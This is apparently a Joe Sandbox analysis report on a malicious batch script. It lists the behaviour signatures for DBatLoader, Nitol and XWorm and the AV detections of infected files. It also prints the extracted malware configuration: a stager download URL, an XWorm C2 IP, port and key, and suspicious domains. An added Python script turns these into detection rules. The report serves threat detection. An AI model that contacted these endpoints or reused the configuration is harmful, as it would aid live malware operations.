Windows Analysis Report
E_dekont.cmd

Overview

General Information

Sample name: E_dekont.cmd
Analysis ID: 1546600
MD5: 79c1ba6106f6cb367fc280abae110506
SHA1: 2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256: 09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
Tags: cmduser-lowmal3

Detection

DBatLoader, Nitol, PureLog Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Nitol
Yara detected PureLog Stealer
Yara detected XWorm
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Nitol
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Name: XWorm
Description: Malware with a wide range of capabilities, ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection

Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: E_dekont.cmd Malware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: uaafd.biz Virustotal: Detection: 12%
Source: xnxvnn.biz Virustotal: Detection: 13%
Source: nlscndwp.biz Virustotal: Detection: 11%
Source: vjaxhpbji.biz Virustotal: Detection: 13%
Source: E_dekont.cmd ReversingLabs: Detection: 44%
Source: E_dekont.cmd Virustotal: Detection: 46%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Joe Sandbox ML: detected
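The two Malware Configuration Extractor lines above are the most actionable output of this section: the DBatLoader stager URL and the XWorm C2 endpoint, plus the four VirusTotal-flagged .biz domains. The script below is an added example, not part of the Joe Sandbox report or of any tooling it names: it parses those report lines into indicators, runs them over constructed Zeek-style JSON records (invented for the example; only the 188.114.97.3:443 peer comes from the report's TLS line, and it is deliberately not an indicator), and emits a Suricata rule for the C2. The rule assumes TCP transport; the report gives only the IP and port.

```python
"""Turn the extracted configuration and flagged domains into network indicators
and run them over constructed Zeek-style JSON log records."""
import json
import re
from urllib.parse import urlparse

# Lines copied from the AV Detection section of the report above.
REPORT_LINES = [
    'Source: E_dekont.cmd Malware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}',
    'Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}',
    'Source: uaafd.biz Virustotal: Detection: 12%',
    'Source: xnxvnn.biz Virustotal: Detection: 13%',
    'Source: nlscndwp.biz Virustotal: Detection: 11%',
    'Source: vjaxhpbji.biz Virustotal: Detection: 13%',
]

# Constructed sample records (not from the report), shaped like Zeek's JSON
# conn.log / dns.log output. 188.114.97.3:443 is the TLS peer the report saw
# but did not flag, so it must not match.
SAMPLE_LOG = [
    '{"_path":"dns","id.orig_h":"192.168.2.8","query":"chichometextiles.com"}',
    '{"_path":"conn","id.orig_h":"192.168.2.8","id.resp_h":"62.60.190.120","id.resp_p":7923,"proto":"tcp"}',
    '{"_path":"dns","id.orig_h":"192.168.2.8","query":"xnxvnn.biz"}',
    '{"_path":"conn","id.orig_h":"192.168.2.8","id.resp_h":"188.114.97.3","id.resp_p":443,"proto":"tcp"}',
    '{"_path":"dns","id.orig_h":"192.168.2.8","query":"www.msftconnecttest.com"}',
]

CONFIG_RE = re.compile(r"Malware Configuration Extractor: (?P<family>\S+) (?P<json>\{.*\})$")
DOMAIN_RE = re.compile(r"^Source: (?P<domain>[a-z0-9.-]+\.[a-z]{2,}) Virustotal: Detection: (?P<pct>\d+)%")


def parse_configs(lines):
    """Return {family: config_dict}; the extractor prints each config as JSON."""
    configs = {}
    for line in lines:
        m = CONFIG_RE.search(line)
        if m:
            configs[m.group("family")] = json.loads(m.group("json"))
    return configs


def build_iocs(lines):
    """Map (kind, value) -> reason for every network indicator in the lines."""
    iocs = {}
    configs = parse_configs(lines)
    for url in configs.get("DBatLoader", {}).get("Download Url", []):
        iocs[("domain", urlparse(url).hostname.lower())] = "DBatLoader stager download host"
        iocs[("url", url)] = "DBatLoader stager download URL"
    xworm = configs.get("Xworm", {})
    for c2 in xworm.get("C2 url", []):
        iocs[("ip_port", (c2, int(xworm["Port"])))] = f"{xworm.get('Version', 'XWorm')} C2"
    for line in lines:
        m = DOMAIN_RE.match(line)
        if m:
            iocs[("domain", m.group("domain"))] = f"VirusTotal-flagged domain ({m.group('pct')}%)"
    return iocs


def match_logs(log_lines, iocs):
    """Return (source_host, indicator, reason) for every record that hits an IOC."""
    hits = []
    for raw in log_lines:
        rec = json.loads(raw)
        if rec["_path"] == "dns":
            key = ("domain", rec["query"].lower().rstrip("."))
        elif rec["_path"] == "conn":
            key = ("ip_port", (rec["id.resp_h"], int(rec["id.resp_p"])))
        else:
            continue
        if key in iocs:
            hits.append((rec["id.orig_h"], key[1], iocs[key]))
    return hits


def suricata_rule(ip, port, msg, sid):
    """C2 rule for the XWorm endpoint. TCP is assumed: the report gives the
    IP and port but not the transport protocol."""
    return (f'alert tcp $HOME_NET any -> {ip} {port} (msg:"{msg}"; '
            f"flow:to_server,established; classtype:trojan-activity; sid:{sid}; rev:1;)")


if __name__ == "__main__":
    iocs = build_iocs(REPORT_LINES)
    for hit in match_logs(SAMPLE_LOG, iocs):
        print(hit)
    print(suricata_rule("62.60.190.120", 7923, "XWorm V5.6 C2 (Joe Sandbox analysis 1546600)", 1000001))
```

The domain match is exact; a sandbox run only shows the domains the sample resolved during its time budget, so for the DGA-looking .biz names a practitioner would pair this with the Nitol/DGA behaviour noted under "Queries random domain names" rather than rely on the four listed hosts alone.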

Compliance

Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
